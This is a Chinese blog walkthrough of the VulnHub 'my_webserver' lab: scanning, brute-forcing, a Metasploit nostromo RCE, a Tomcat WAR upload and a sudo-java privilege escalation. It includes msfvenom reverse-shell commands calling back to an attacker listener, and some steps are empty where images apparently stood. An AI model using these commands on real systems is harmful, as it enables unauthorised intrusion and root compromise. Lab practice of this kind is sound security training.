vulnhub之my_webserver

一、信息收集

1、c段扫描,获取靶机IP

──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.62.129/24                       
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:55 HKT
Nmap scan report for 192.168.62.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.62.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:F4:60:0B (VMware)
Nmap scan report for 192.168.62.130
Host is up (0.00047s latency).
MAC Address: 00:0C:29:39:83:54 (VMware)
Nmap scan report for 192.168.62.254
Host is up (0.00038s latency).
MAC Address: 00:50:56:EB:19:29 (VMware)
Nmap scan report for 192.168.62.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds

  因为对局域网内的IP较熟悉,所以知道192.168.62.130为新增靶机的IP地址。

2、靶机开放端口扫描

①tcp协议端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:57 HKT
Nmap scan report for 192.168.62.130
Host is up (0.0022s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

②udp协议端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.62.130 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 00:00 HKT
Warning: 192.168.62.130 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.130
Host is up (0.00053s latency).
All 65535 scanned ports on 192.168.62.130 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.87 seconds
                                                             
端口运行服务版本:
──(kali㉿kali)-[/usr/share/wordlists] └─$ sudo nmap -sV -sT -O -p22,80,2222,3306,8009,8080,8081 192.168.62.130 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 23:45 HKT Nmap scan report for 192.168.62.130 Host is up (0.00068s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 2222/tcp open http nostromo 1.9.6 3306/tcp open mysql MySQL (unauthorized) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8081/tcp open http nginx 1.14.2 MAC Address: 00:0C:29:39:83:54 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds

 ③开放端口基本漏洞扫描

──(kali㉿kali)-[~]                                                                                                                                                                                        [18/200]
└─$ sudo nmap --script=vuln -p22,80,2222,3306,8009,8080,8081 192.168.62.130                                                                                                                                        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-08 23:16 HKT                                                                                                                                                    
Nmap scan report for 192.168.62.130                                                                                                                                                                                
Host is up (0.00055s latency).                                                                                                                                                                                     
                                                                                                                                                                                                                   
PORT     STATE SERVICE                                                                                                                                                                                             
22/tcp   open  ssh                                                                                                                                                                                                 
80/tcp   open  http                                                                                                                                                                                                
| http-wordpress-users:                                                                                                                                                                                            
| Username found: ap20dsero039                                                                                                                                                                                     
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'                                                                                                                
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                                              
| http-csrf:                                                                                                                                                                                                       
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.62.130                                                                                                                                     
|   Found the following possible CSRF vulnerabilities:                                                                                                                                                             
|                                                                                                                                                                                                                  
|     Path: http://192.168.62.130:80/                                                                                                                                                                              
|     Form id: s1                                                                                                                                                                                                  
|_    Form action: http://www.armour.local/                                                              
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                                                   
| http-enum:                                        
|   /wp-login.php: Possible admin folder                                                                 
|   /wp-json: Possible admin folder                                                                      
|   /robots.txt: Robots file                                                                             
|   /readme.html: Wordpress version: 2                                                                   
|   /: WordPress version: 5.3.14                                                                         
|   /feed/: Wordpress version: 5.3.14                                                                    
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.                                                                                                                                                      
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.                                                                                                                                                
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.                                                                                                                                                    
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.                                                                                                                                                 
|   /wp-login.php: Wordpress login page.                                                                 
|   /wp-admin/upgrade.php: Wordpress login page.                                                         
|   /readme.html: Interesting, a readme.                                                                 
|_  /0/: Potentially interesting folder                                                                  
2222/tcp open  EtherNetIP-1                                                                              
3306/tcp open  mysql                                
8009/tcp open  ajp13                                
8080/tcp open  http-proxy                           
| http-slowloris-check:                             
|   VULNERABLE:                                     
|   Slowloris DOS attack                            
|     State: LIKELY VULNERABLE                                                                           
|     IDs:  CVE:CVE-2007-6750   

| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
8081/tcp open blackice-icecap
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 70.14 seconds

 

二、getshell

 1、22号端口渗透

①查询版本漏洞--无

──(kali㉿kali)-[/usr/share/wordlists]
└─$ searchsploit OpenSSH 7.9p1 Debian 10+deb10u2                        
Exploits: No Results
Shellcodes: No Results

②简单爆破--无

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l webserver -P rockyou.txt 192.168.62.130 ssh -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:38:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.62.130:22/
[ERROR] target ssh://192.168.62.130:22/ does not support password authentication (method reply 4).                                                                                                   

 3、2222端口利用

  ①搜索2222端口历史漏洞

msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec

  ②发现一个RCE漏洞,尝试利用

msf6 > use 0                                                                                                                                                                                                       
[*] Using configured payload cmd/unix/reverse_perl                                                                                                                                                                 
msf6 exploit(multi/http/nostromo_code_exec) > option                                                                                                                                                               
[-] Unknown command: option                                                                                                                                                                                        
msf6 exploit(multi/http/nostromo_code_exec) > options                                                                                                                                                              
                                                                                                                                                                                                                   
Module options (exploit/multi/http/nostromo_code_exec):                                                                                                                                                            
                                                                                                                                                                                                                   
   Name     Current Setting  Required  Description                                                                                                                                                                 
   ----     ---------------  --------  -----------                                                                                                                                                                 
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]                                                                                                                
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit                                                                                
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.62.130
rhosts => 192.168.62.130
msf6 exploit(multi/http/nostromo_code_exec) > set rport 2222
rport => 2222
msf6 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.62.130 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 2222 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.62.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic (Unix In-Memory)

 

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.62.129:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.62.129:4444 -> 192.168.62.130:53560) at 2023-02-05 18:05:01 +0800

id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
daemon@webserver:/usr/bin$

  获取到shell!!!!

4、3306端口渗透--此为个人尝试

①简单爆破--mysql中应该是开启了白名单功能

──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l root -P rockyou.txt 192.168.62.130 mysql -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:41:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.62.130:3306/
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server

 5、8008

6、8080端口利用

  浏览器输入http://ip:port浏览计算机运行的服务,根据运行的tomcat服务找出其后台URL:

 

 

 

 

三、提权

 1、收集系统信息

daemon@webserver:/usr/bin$ ls -l /etc/crontab
ls -l /etc/crontab
-rw-r--r-- 1 root root 1042 Oct 11  2019 /etc/crontab
daemon@webserver:/usr/bin$ ls -l /etc/passwd
ls -l /etc/passwd
-rw-r--r-- 1 root root 1447 Mar 31  2020 /etc/passwd
daemon@webserver:/usr/bin$ sudo -l
sudo -l


sudo: unable to resolve host webserver: Name or service not known

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

②find / -writable -type f 2>/dev/null|grep *users.xml

 

 

 ③发现tomcat后台登陆人员配置文件并查看,获得tomcat的后台用户名和密码

 

 ④登陆tomcat的后台,发现有文件上传的功能

 

 ⑤msfvenom制作木马

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=8888 -f jar > doit.war 

⑥在tomcat后台将获取到的木马上传,设置成功后点击运行(点击红框中的名字)

 

 ⑦msf配置LHOST,LPORT,PAYLOAD(与制作密码时一致)监听木马设置的端口,然后运行

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run
                                                                                                                                                                                                                   
[*] Started reverse TCP handler on 192.168.62.129:8888                                                                                                                                                        
[*] Command shell session 1 opened (192.168.62.129:8888 -> 192.168.62.130:58322) at 2023-02-05 22:36:47 +0800                                                                                                      
                                                                                                                                                                                                                   
python -c 'import pty;pty.spawn("/bin/bash")'          //利用python反弹shell     
tomcat@webserver:~$

⑧查看tomcat用户的权限,发现可以使用root权限执行java服务。

tomcat@webserver:/tmp$ sudo -l
sudo -l
sudo: unable to resolve host webserver: Name or service not known
Matching Defaults entries for tomcat on webserver:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomcat may run the following commands on webserver:
    (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java

⑨msfvenom制作.jar格式木马

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=9999 -f jar >xiaoliyu.jar

⑩使用upload功能将木马上传到靶机(我这里不知道为啥upload功能用不了,所以使用scp命令复制文件)

⑪msf设置监听9999端口

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run

⑫以root权限运行.jar格式文件(不知为啥我这里运行出错了,看网上说是文件传输过程中损坏了,试着使用sftp传输文件也无法运行,所以得找其他方法进行提权,正常的话执行⑬即为root权限了)

sudo -u root java -jar xiaoliyu.jar

⑬连接后使用python反弹shell,可以发现已经为root权限

 

 ⑭因为这个⑫不成功,因此在网上搜索linux提权方法,发现可以使用CVE-2021-4034进行提权:

(2条消息) CVE-2021-4034:Linux Polkit 权限提升漏洞复现及修复_Acczdy的博客-CSDN博客

 

 

   且这个方法可以在2222端口渗透成功获取shell后立刻使用。

 

posted @ 2023-02-06 00:38  lalallalalal  阅读(371)  评论(0)    收藏  举报